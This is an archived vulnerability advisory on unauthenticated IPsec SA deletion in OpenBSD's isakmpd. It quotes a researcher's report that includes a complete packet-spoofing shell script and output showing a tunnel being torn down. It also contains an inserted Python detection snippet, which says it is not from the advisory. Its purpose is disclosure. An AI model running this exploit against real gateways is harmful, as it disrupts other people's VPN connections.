SecurityTracker Archives
Category: Application (Security) > isakmpd
Vendors: OpenBSD
(Software Still Vulnerable) OpenBSD ISAKMP Daemon (isakmpd) May Let Remote Users Delete Arbitrary Security Associations
SecurityTracker Alert ID:  1010471
SecurityTracker URL:  http://securitytracker.com/id/1010471
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 11 2004
Impact:   Modification of system information
Exploit Included:  Yes  

Description:   Some vulnerabilities were reported in the OpenBSD ISAKMP daemon (isakmpd). A remote user may be able to cause denial of service conditions.

In November 2003, Thomas Walpuski reported that the software contains flaws in the processing of delete payloads that may allow a remote user to delete IKE and IPSec security associations (SAs).

The report indicated that, in Quick Mode, isakmpd does not require message encryption. Some Main Mode messages are also affected.

It is reported that isakmpd does not use payload encryption when responding in Quick Mode when the initiator did not apply payload encryption.

It is also reported that isakmpd will accept a Phase 2 message that contains a delete payload but not a hash payload.

It is also reported that "unexpected" hash payloads are not verified.

It is also reported that when the target isakmpd server receives a delete payload during Phase 2 negotiation, the server does not validate whether the sender is the owner of the referenced SA.

In June 2004, Thomas Walpuski reported that the software is still vulnerable.
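As an added example (not from the advisory, the report, or isakmpd itself), a small Python check that a network sensor or a test harness could run: it parses the ISAKMP header and generic payload chain and flags a delete payload that arrives in cleartext, or without an accompanying hash payload, which is the condition the report describes. The sample packet is constructed from the byte layout of the demonstration script, with a placeholder initiator cookie; `parse_isakmp` and `classify_delete` are names chosen here.

```python
import struct

ISAKMP_HDR_LEN = 28
PAYLOAD_HASH, PAYLOAD_DELETE, FLAG_ENCRYPTION = 8, 12, 0x01
EXCHANGE_NAMES = {2: "main mode", 5: "informational", 32: "quick mode"}

def parse_isakmp(pkt):
    """Return (exchange type, flags, payload type ids) for one raw ISAKMP message.
    The chain is only walked when the encryption flag is clear (else it is ciphertext)."""
    if len(pkt) < ISAKMP_HDR_LEN:
        raise ValueError("truncated ISAKMP header")
    next_pl, _ver, exch, flags, _msg_id, length = struct.unpack_from(">BBBBII", pkt, 16)
    if length != len(pkt):
        raise ValueError("ISAKMP length field does not match packet size")
    types, off = [], ISAKMP_HDR_LEN
    while next_pl != 0 and not flags & FLAG_ENCRYPTION:
        if off + 4 > len(pkt):
            raise ValueError("payload chain runs past end of packet")
        cur = next_pl
        next_pl, _reserved, plen = struct.unpack_from(">BBH", pkt, off)
        if plen < 4 or off + plen > len(pkt):
            raise ValueError("bad generic payload length")
        types.append(cur)
        off += plen
    return exch, flags, types

def classify_delete(pkt):
    """None when no readable delete payload is present; otherwise a reason string
    saying why the deletion must not be honoured without further authentication."""
    exch, flags, types = parse_isakmp(pkt)
    if flags & FLAG_ENCRYPTION or PAYLOAD_DELETE not in types:
        return None
    name = EXCHANGE_NAMES.get(exch, "exchange %d" % exch)
    if PAYLOAD_HASH not in types:
        return "cleartext delete payload without hash payload in %s" % name
    return "cleartext delete payload in %s" % name

# Constructed sample: the 88-byte message the demonstration script assembles (placeholder cookie).
SAMPLE = (
    b"\x11" * 8 + b"\x00" * 8                      # initiator / responder cookies
    + b"\x01\x10\x02\x00"                          # next=SA(1), version 1.0, main mode, flags 0
    + b"\x00\x00\x00\x00" + b"\x00\x00\x00\x58"    # message ID 0, total length 88
    + b"\x0c\x00\x00\x2c" + b"\x00\x00\x00\x01" * 2   # SA: next=Delete(12), len 44, DOI, situation
    + b"\x00\x00\x00\x20" + b"\x01\x01\x00\x01"    # proposal 1, protocol ISAKMP, one transform
    + b"\x00\x00\x00\x18" + b"\x00\x01\x00\x00"    # transform KEY_IKE
    + b"\x80\x01\x00\x05\x80\x02\x00\x02\x80\x03\x00\x01\x80\x04\x00\x02"  # 3DES, SHA, PSK, group 2
    + b"\x00\x00\x00\x10" + b"\x00\x00\x00\x01"    # Delete: next=0, len 16, DOI IPsec
    + b"\x03\x04\x00\x01" + bytes.fromhex("901e38d9")  # protocol ESP, SPI size 4, one SPI
)
```

A message whose encryption flag is set is reported as clean here only because its payloads cannot be read on the wire; the hash check for such messages belongs in the daemon after decryption.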

A demonstration exploit script is provided in the source message below.

Impact:   A remote user may be able to generate a message to cause a security association to be deleted by the target isakmpd process.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.openbsd.org/
Cause:   Authentication error
Underlying OS:  UNIX (FreeBSD), UNIX (NetBSD), UNIX (OpenBSD)

Message History:   This archive entry is a follow-up to the message listed below.
Nov 3 2003 OpenBSD ISAKMP Daemon (isakmpd) May Let Remote Users Delete Arbitrary Security Associations



Source Message Contents

Subject:  unauthorized deletion of IPsec SAs in isakmpd, still


1 Abstract

  For nearly 10 months a handful of OpenBSD developers have been trying
  to fix a plethora of payload handling flaws in isakmpd. On 2004/01/13
  they released something like a final patch to a broader public. The
  patch protects against some specific attacks, but does not solve the
  problem.

2 Description

  Unauthorized deletion of IPsec SAs is still possible using a delete
  payload piggybacked on an initiation of main mode.

  For more details trace message_recv() ff. with gdb during an attack.

3 Affected Systems

  All (recent) versions of isakmpd are affected. The attack has been
  successfully tested against the most recent CVS-version of isakmpd.

4 The Attack

  Here we go. There is an IPsec tunnel between sg-a and sg-b:

    sg-a# cat /kern/ipsec | grep SPI
    SPI = 97e49ca2, Destination = <sg-a's IP address>, Sproto = 50
    SPI = 901e38d9, Destination = <sg-b's IP address>, Sproto = 50

  The attacker built some little script, because this time he wants to
  shoot down a bunch of IPsec SAs:

    attacker# cat during_these_hostile_and_trying_times_and_what-not
    #!/bin/sh
    if [ ! $# -eq 3 ]; then
      echo "usage: $0 <faked-src> <victim> <spi>";
      exit;
    fi
    
    src=$1; dst=$2
    spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
    cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`
    
    dnet hex \
      $cky_i \
      "\x00\x00\x00\x00\x00\x00\x00\x00" \
      "\x01\x10\x02\x00" \
      "\x00\x00\x00\x00" \
      "\x00\x00\x00\x58" \
        "\x0c\x00\x00\x2c" \
        "\x00\x00\x00\x01" \
        "\x00\x00\x00\x01" \
          "\x00\x00\x00\x20" \
          "\x01\x01\x00\x01" \
          "\x00\x00\x00\x18" \
          "\x00\x01\x00\x00" \
          "\x80\x01\x00\x05" \
          "\x80\x02\x00\x02" \
          "\x80\x03\x00\x01" \
          "\x80\x04\x00\x02" \
        "\x00\x00\x00\x10" \
        "\x00\x00\x00\x01" \
        "\x03\x04\x00\x01" \
        $spi |
    dnet udp sport 500 dport 500 |
    dnet ip proto udp src $src dst $dst |
    dnet send

  He fires up his script with appropriate parameters:
    
    attacker# ./during_these_hostile_and_trying_times_and_what-not \
    > sg-b sg-a 901e38d9

  And the victim's IPsec SAs _and_ policies fade away almost
  instantaneously:
    
    sg-a# cat /kern/ipsec  
    Hashmask: 31, policy entries: 0

5 Solution?

  There are no bug fixes, yet.

Thomas Walpuski

Copyright 2019, SecurityGlobal.net LLC